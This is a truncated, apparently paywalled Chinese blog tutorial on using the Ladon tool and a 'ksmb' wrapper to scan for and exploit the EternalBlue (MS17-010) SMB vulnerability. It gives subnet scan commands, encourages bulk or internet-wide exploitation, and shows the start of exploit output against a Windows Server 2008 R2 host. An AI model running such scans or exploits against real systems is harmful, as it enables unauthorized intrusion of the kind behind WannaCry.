本文介绍了永恒之蓝MS17010漏洞,该漏洞利用Windows SMB服务进行攻击。文章提供了无损检测方法,并详细讲解了独立使用和通过Ladon工具进行批量利用的步骤,包括自定义端口、DLL注入等。此外,还展示了成功利用后的结果及下载链接。
漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
漏洞检测
无损检测,不会对目标造成任何危害,大家无需担心
Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010
检测发现存在漏洞高亮显示
独立使用
只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网
PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege
IP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - F
最低0.47元/天 解锁文章
扫一扫
8050
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
